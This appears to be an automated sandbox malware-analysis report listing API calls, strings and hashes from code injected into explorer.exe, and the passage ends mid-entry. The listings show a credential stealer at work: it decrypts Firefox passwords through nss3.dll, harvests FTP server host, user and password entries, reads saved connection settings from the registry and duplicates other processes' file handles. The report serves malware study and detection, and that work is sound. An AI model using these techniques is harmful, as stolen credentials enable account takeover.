                                                                                                                            • Instruction ID: bde18d6c00b61c63783d1dcb8ad73af420728683423087e064c2d80392746c95
                                                                                                                            • Opcode Fuzzy Hash: 5fd5837eb178fd12c739eba98a902e93e94e63e485a28a47c4b1e42123986e93
                                                                                                                            • Instruction Fuzzy Hash: B3F0242670064817D6112A2ACC80E3B765ECBCA3AAB03003FF41983221EE2B7C40827C
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0043A35F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: FilePointer
• String ID: winSeekFile
• API String ID: 973152223-3168307952
• Opcode ID: 9e7868070d0d0efac637fa1195353d9a264a979019d57a990f5c0dfc1d614ed7
• Instruction ID: c28ba9198957e6ade5bc78ec97c0b506018acf4652cdaaba75a41c9fd50f8004
• Opcode Fuzzy Hash: 9e7868070d0d0efac637fa1195353d9a264a979019d57a990f5c0dfc1d614ed7
• Instruction Fuzzy Hash: 98F09030654204AF97119F64DC01AAB77AAEB49320F20866BFDA1C66D0DA34DD1096A6
APIs
• RtlAllocateHeap.NTDLL(04CB0000,00000000,?), ref: 00439EB5
Strings
• failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00439ECD
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: AllocateHeap
• String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
• API String ID: 1279760036-667713680
• Opcode ID: bf51ed5dc28e2c5015eb164a600b4904d16f840817b1dfb19a020fe8bd611539
• Instruction ID: 0551b5b1d8191fa4f4d9f3370da66dc03010a84e56b9dfb570d933922bc5f580
• Opcode Fuzzy Hash: bf51ed5dc28e2c5015eb164a600b4904d16f840817b1dfb19a020fe8bd611539
• Instruction Fuzzy Hash: DBE0C2776082117BC2222794AC05F2FB768EBA8F50F150037FA00A26B0C2B8DC0187AA
APIs
• RtlFreeHeap.NTDLL(04CB0000,00000000,?), ref: 00439EF8
Strings
• failed to HeapFree block %p (%lu), heap=%p, xrefs: 00439F0E
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: FreeHeap
• String ID: failed to HeapFree block %p (%lu), heap=%p
• API String ID: 3298025750-4030396798
• Opcode ID: ca53e07b40ff8a631e016933696b89010de0571b60cadc6d8d0019ce1dbb1901
• Instruction ID: 5f80be317e21cce8f094aec7d8abf2be8a6a435f0bcba425abd992bf3b123478
• Opcode Fuzzy Hash: ca53e07b40ff8a631e016933696b89010de0571b60cadc6d8d0019ce1dbb1901
• Instruction Fuzzy Hash: A5D0C27310820177C3102B509C01F3F7738AFA8B00F04043BF21091175C2B89840AB6D
APIs
• CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
• CloseHandle.KERNELBASE(00000000), ref: 00431B8F
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: bd29e5d7c0f63967d2a91a6c65664367067c9d4455676ac7d3552c95f08f7f35
• Instruction ID: 5789d7cd6e24c7bc6b24fb9a2dc4514b16513a98844a6f4d48f25c84bfd42507
• Opcode Fuzzy Hash: bd29e5d7c0f63967d2a91a6c65664367067c9d4455676ac7d3552c95f08f7f35
• Instruction Fuzzy Hash: 14D0127125363062D5B557357C0CEABAE1CDF076B5F050A25B51DD91E1E2189C8782E8
APIs
  • Part of subcall function 00431162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0043116F
• GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
• RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: Heap$FreeProcessQueryVirtual
• String ID:
• API String ID: 2580854192-0
• Opcode ID: 3c24d6c787b04d5b3ce9f73348c8e9acc572de3f80428b95906996088c581c1e
• Instruction ID: 466a28dcb9207cbeda36715575463fb0f31d55aad8d1e8272c8899010e5ec0f5
• Opcode Fuzzy Hash: 3c24d6c787b04d5b3ce9f73348c8e9acc572de3f80428b95906996088c581c1e
• Instruction Fuzzy Hash: 39C08C3100022052C9A02BA03C0CBCF2B1ACF0D322F02085AB90197263CA698C4183A8
APIs
• GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
• RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: bb9f95b2706471de0f2ba9de71f283c28a52f394edfbdcdc45cc1c247f8c3644
• Instruction ID: 787d245fb9655365faefe1cbd4fba9effdba40b613877560947bc4d7a19650dd
• Opcode Fuzzy Hash: bb9f95b2706471de0f2ba9de71f283c28a52f394edfbdcdc45cc1c247f8c3644
• Instruction Fuzzy Hash: D7A002755501045BDD845BA49E4DA1E3519F744702F114958754586053D96454048725
APIs
• RtlZeroMemory.NTDLL(?,00000018), ref: 004312B5
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: MemoryZero
• String ID:
• API String ID: 816449071-0
• Opcode ID: af48dd5e402ec486cb4fa509ddbe2b674e330584176a2a1f566f9359c9d4a5cb
• Instruction ID: 5ade35cb5213dba85017e0bc9578c55474da29059dd4270e44ca2c88fcba699d
• Opcode Fuzzy Hash: af48dd5e402ec486cb4fa509ddbe2b674e330584176a2a1f566f9359c9d4a5cb
• Instruction Fuzzy Hash: E311F8B1A01209AFDB50DFA5D988AAFB7BCEB08741F10442AF945E7251D734DD01CB68
APIs
• GetFileAttributesW.KERNELBASE(00000000,00000000,00432C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00431BAA
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 29f40640e66eaeead4d2f74a220b9a99a05c2f2a2a2cad5e31793062cc2aea99
• Instruction ID: b693558cb1f35c50d0c808c9f70e4ee0c3361309c7449f4fc5c04912652c963b
• Opcode Fuzzy Hash: 29f40640e66eaeead4d2f74a220b9a99a05c2f2a2a2cad5e31793062cc2aea99
• Instruction Fuzzy Hash: 46D0A733D0243042896456343C04857E1445A0577471B0775FC25F32E0E228DC8243C8
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00431684
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: CreateGlobalStream
• String ID:
• API String ID: 2244384528-0
• Opcode ID: 05f25da1cbb2d5891a4e47ee756b5c67aa094baf3c2920428fa212332c42acdc
• Instruction ID: c81a99ab08c7f8712347e7db531447aab7e0122f9b54079b80138b8069807361
• Opcode Fuzzy Hash: 05f25da1cbb2d5891a4e47ee756b5c67aa094baf3c2920428fa212332c42acdc
• Instruction Fuzzy Hash: 8DC012301202219FE7602A608C0AB8A26D4AF197A2F0619AAA0859D090E2A808C08A94
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0043158A), ref: 00431056
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 7b37b37bd7d0c94f66ebc6f685c31fe765d24cd3d08a98ba3b2c5cd90fde1851
• Instruction ID: 3035af6bfdf8d380f5ac43a5eb8c7f016089f06affd869601e7dba3012b447ff
• Opcode Fuzzy Hash: 7b37b37bd7d0c94f66ebc6f685c31fe765d24cd3d08a98ba3b2c5cd90fde1851
• Instruction Fuzzy Hash: D2A002F07D53007AFDA997A2AE1FF1929389741F02F110658B30D7C0D056E57500862D
APIs
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00434A5B,?,?,00000000,?,?,?,?,00434B66,?), ref: 00431065
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 89ab71ac070360565af09993e5ad2fd24c2a2e0f2080eb04729c32744004c38b
• Instruction ID: 44aa8079cca54ab86f571b86f5cedd974066a2b77ab06bfd82e7a1c26f315ffd
• Opcode Fuzzy Hash: 89ab71ac070360565af09993e5ad2fd24c2a2e0f2080eb04729c32744004c38b
• Instruction Fuzzy Hash: E0A0027069070066EDF45B205D0EF0926156740B01F2149587641AD0D249A5E0448B1C
APIs
• CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 004334C0
  • Part of subcall function 004333C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00433401
• OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004337A8), ref: 004334E9
  • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
  • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
• NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0043351E
• NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00433541
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00433586
• DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0043358F
• lstrcmpiW.KERNEL32(00000000,File), ref: 004335B6
• NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 004335DE
• StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 004335F6
• StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00433606
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0043361E
• GetFileSize.KERNEL32(?,00000000), ref: 00433631
• SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00433658
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0043366B
• ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00433681
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004336AD
• CloseHandle.KERNEL32(?), ref: 004336C0
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004337A8), ref: 004336F5
  • Part of subcall function 00431C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00431CC0
  • Part of subcall function 00431C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00431CDA
  • Part of subcall function 00431C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00431CE6
• CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004337A8), ref: 00433707
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
• String ID: File
• API String ID: 3915112439-749574446
• Opcode ID: 2131a2303e721dfae2174c6bd9b6d26caca89b65fabeae345ffcf0fd2ed382b2
• Instruction ID: 44a0c8185f7fd8acd06a206b58f9a9064254d1b3ce0e4d5e5d7d9e13e6c0d445
• Opcode Fuzzy Hash: 2131a2303e721dfae2174c6bd9b6d26caca89b65fabeae345ffcf0fd2ed382b2
• Instruction Fuzzy Hash: 6E61A070204300BFD760AF21CC89F2F7BE9EB88756F10192DF946963A1D779DA448B59
APIs
• memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00484502
                                                                                                                            • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0048475F
                                                                                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00484803
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp$memcpy
                                                                                                                            • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                            • API String ID: 231171946-1096842476
                                                                                                                            • Opcode ID: 04a69ccf047413bb2107c853bfc65e2737904645a85727e66eda4176b3b390b1
                                                                                                                            • Instruction ID: f9cb84a6d7bdab28ce42f23e2e95cdad0568f83e3312e7cb6ac1390aa6dd0e2b
                                                                                                                            • Opcode Fuzzy Hash: 04a69ccf047413bb2107c853bfc65e2737904645a85727e66eda4176b3b390b1
                                                                                                                            • Instruction Fuzzy Hash: 3EC1D170A083539BDB34AE18849172FB7D1ABDA318F140D2FE4D597352E72C9845875E
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00436AAA: memset.NTDLL ref: 00436AC5
                                                                                                                            • memset.NTDLL ref: 00455F53
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                            • API String ID: 2221118986-594550510
                                                                                                                            • Opcode ID: 7e1712b6b048669f37cd20d3946d9390c2fc274e3b7fcc62b60d0141213af27a
                                                                                                                            • Instruction ID: 58600f9d49a2d4cf012793eb93f52d2e1654d9b299c31ced64b813b859bf2337
                                                                                                                            • Opcode Fuzzy Hash: 7e1712b6b048669f37cd20d3946d9390c2fc274e3b7fcc62b60d0141213af27a
                                                                                                                            • Instruction Fuzzy Hash: 9BC18D70604702AFDB14DF25C480A2FB7E2BF88715F55891EF84487382DB39D95ACB9A
                                                                                                                            APIs
                                                                                                                            • CoCreateInstance.COMBASE(004862B0,00000000,00000001,004862A0,?), ref: 0043445F
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004344AA
                                                                                                                            • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0043456E
                                                                                                                            • lstrcmpiW.KERNEL32(Servers,?), ref: 0043457D
                                                                                                                            • lstrcmpiW.KERNEL32(Settings,?), ref: 0043458C
                                                                                                                              • Part of subcall function 004311E1: lstrlenW.KERNEL32(?,7622F360,00000000,?,00000000,?,004346E3), ref: 004311ED
                                                                                                                              • Part of subcall function 004311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0043120F
                                                                                                                              • Part of subcall function 004311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00431231
                                                                                                                            • lstrcmpiW.KERNEL32(Server,?), ref: 004345BE
                                                                                                                            • lstrcmpiW.KERNEL32(LastServer,?), ref: 004345CD
                                                                                                                            • lstrcmpiW.KERNEL32(Host,?), ref: 00434657
                                                                                                                            • lstrcmpiW.KERNEL32(Port,?), ref: 00434679
                                                                                                                            • lstrcmpiW.KERNEL32(User,?), ref: 0043469F
                                                                                                                            • lstrcmpiW.KERNEL32(Pass,?), ref: 004346C5
                                                                                                                            • wsprintfW.USER32 ref: 0043471E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                            • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                            • API String ID: 2230072276-1234691226
                                                                                                                            • Opcode ID: 445fdfdd74574c051e3f5cc9fff04f89ba264ec1822ded7891338a5ccfd602e3
                                                                                                                            • Instruction ID: fc015ca3d079c8d6687890a0cde6a1c3ad820aae2fc8187c7f07a69e09f70ee7
                                                                                                                            • Opcode Fuzzy Hash: 445fdfdd74574c051e3f5cc9fff04f89ba264ec1822ded7891338a5ccfd602e3
                                                                                                                            • Instruction Fuzzy Hash: 99B13771204302AFD740EF64C884E6BB7E9EFC9745F10896DF5898B260DB75E806CB66
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                              • Part of subcall function 00431090: lstrlenW.KERNEL32(?,?,00000000,004317E5), ref: 00431097
                                                                                                                              • Part of subcall function 00431090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 004310A8
                                                                                                                              • Part of subcall function 004319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00432CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 004319C4
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00432503
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0043250A
                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00432563
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00432570
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00432591
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0043259E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 004325AB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 004325B8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 004325C5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 004325D2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 004325DF
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(?,?,?,?,00000000,00432783), ref: 0043192B
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00432783), ref: 00431930
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,?), ref: 00431946
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,00000000), ref: 0043194A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                            • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                            • API String ID: 3366569387-3272982511
                                                                                                                            • Opcode ID: 6865bc11f9eacc8933397781955599f24cd4f5a09cfd97a25eedc8d2804fb567
                                                                                                                            • Instruction ID: 753c51c42b55634c5d4287b89258724039da9c1493972456a729716819324d94
                                                                                                                            • Opcode Fuzzy Hash: 6865bc11f9eacc8933397781955599f24cd4f5a09cfd97a25eedc8d2804fb567
                                                                                                                            • Instruction Fuzzy Hash: B8410331A0030A9BDB54AF3A9E5562F3AE59F99748F11143FE84297371DBBC8C018B9D
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00435BF5: memset.NTDLL ref: 00435C07
                                                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 004360E1
                                                                                                                            • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 004360EC
                                                                                                                            • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00436113
                                                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0043618E
                                                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 004361B5
                                                                                                                            • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 004361C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _alldiv$_allrem$memset
                                                                                                                            • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                            • API String ID: 2557048445-1989508764
                                                                                                                            • Opcode ID: 6838eb774acee03fdc61f72175e8385728d27d7d0506a67c4e2a79b1301d0e7e
                                                                                                                            • Instruction ID: 483606aa9446f118c68cecef693c4a1161df0e468cba1e03fe9aa8361dcca53f
                                                                                                                            • Opcode Fuzzy Hash: 6838eb774acee03fdc61f72175e8385728d27d7d0506a67c4e2a79b1301d0e7e
                                                                                                                            • Instruction Fuzzy Hash: B4B16DB1908743BBD725AE24CC85B3F7BD4EB48304F26599FF48296291E62DCD10869E
                                                                                                                            APIs
                                                                                                                            • memcmp.NTDLL(0048637A,BINARY,00000007), ref: 0044D324
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp
                                                                                                                            • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                            • API String ID: 1475443563-3683840195
                                                                                                                            • Opcode ID: 43d3fa34c364d3cef5b3b670fb0bf67fde962dfece147ac1f52f1bb0b0bc8a8b
                                                                                                                            • Instruction ID: 525abce94267dc91e76fb2546ff742aa0580dc85ab486492084eecd6fa6459a3
                                                                                                                            • Opcode Fuzzy Hash: 43d3fa34c364d3cef5b3b670fb0bf67fde962dfece147ac1f52f1bb0b0bc8a8b
                                                                                                                            • Instruction Fuzzy Hash: C751C071A08700ABE720EF65CC41B6B73E5AB49700F644C6FF9928B251D77CE805C79A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
                                                                                                                              • Part of subcall function 004319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                              • Part of subcall function 0043482C: lstrlenW.KERNEL32(?), ref: 00434845
                                                                                                                              • Part of subcall function 0043482C: lstrlenW.KERNEL32(?), ref: 0043488F
                                                                                                                              • Part of subcall function 0043482C: lstrlenW.KERNEL32(?), ref: 00434897
                                                                                                                            • wsprintfW.USER32 ref: 004349A7
                                                                                                                            • wsprintfW.USER32 ref: 004349B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                            • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                            • API String ID: 2889301010-4273187114
                                                                                                                            • Opcode ID: 267beccad496cc5ec00cf1fa084eb17e733d28da644bc4707836799fd1dfdea9
                                                                                                                            • Instruction ID: 6c43a53127b509f807d8271c7c16699431dc17cc50279dc306788e9876b92509
                                                                                                                            • Opcode Fuzzy Hash: 267beccad496cc5ec00cf1fa084eb17e733d28da644bc4707836799fd1dfdea9
                                                                                                                            • Instruction Fuzzy Hash: 173100A07003046BC710AB768C45A2FB6EDEFCD788F06591FB14587351DBBAED418BA9
                                                                                                                            APIs
                                                                                                                            • memcpy.NTDLL(?,?,?,?,00000000), ref: 0043FB32
                                                                                                                            • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0043FB4D
                                                                                                                            • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0043FB60
                                                                                                                            • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0043FB95
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID: -journal$-wal$immutable$nolock
                                                                                                                            • API String ID: 3510742995-3408036318
                                                                                                                            • Opcode ID: a614ee0d3362c15e72b8cac66179f7515401daf51ac878abcaca1cb045d49a2b
                                                                                                                            • Instruction ID: d713bd3f64e9f5017da3ecb241f38ae2208b32befbb090f21e6500dd2f5584ac
                                                                                                                            • Opcode Fuzzy Hash: a614ee0d3362c15e72b8cac66179f7515401daf51ac878abcaca1cb045d49a2b
                                                                                                                            • Instruction Fuzzy Hash: BBD1D5B19043419FC714DF24C881B1BBBE1AF99314F18557EF8998B392DB78D805CB5A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %$-x0$NaN
                                                                                                                            • API String ID: 0-62881354
                                                                                                                            • Opcode ID: 97af279c2d3804047e0bd8858d8159460829083da4cc68962119c53b59c02ce3
